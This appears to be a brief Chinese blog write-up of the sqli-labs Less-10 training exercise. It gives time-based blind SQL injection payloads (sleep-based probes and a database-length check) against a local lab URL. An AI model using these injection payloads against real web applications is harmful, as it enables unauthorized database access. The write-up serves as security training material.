sqli-labs (less-10)

sqli-labs (less-10)

输入

http://127.0.0.1/sql1/Less-10/?id=1 and sleep(5)--+ #快速执行
http://127.0.0.1/sql1/Less-10/?id=1' and sleep(5)--+ #快速执行
http://127.0.0.1/sql1/Less-10/?id=1" and sleep(5)--+ #休眠5秒

sqli-labs (less-10)
判断为字符型注入,这里因为也是不论输入什么都显示 You are in…,依然使用时间盲注

判断当前数据库长度

http://127.0.0.1/sql1/Less-10/?id=1"  and if(length(database())=8,sleep(5),1)--+

sqli-labs (less-10)
我们发现当数据库长度设为8时,页面休眠5秒,判断当前数据库长度为8
然后利用同样方法继续往下面猜解,具体过程请看我的less-9

上一篇:XSS之xss-labs-level18


下一篇:XSS之xss-labs-level19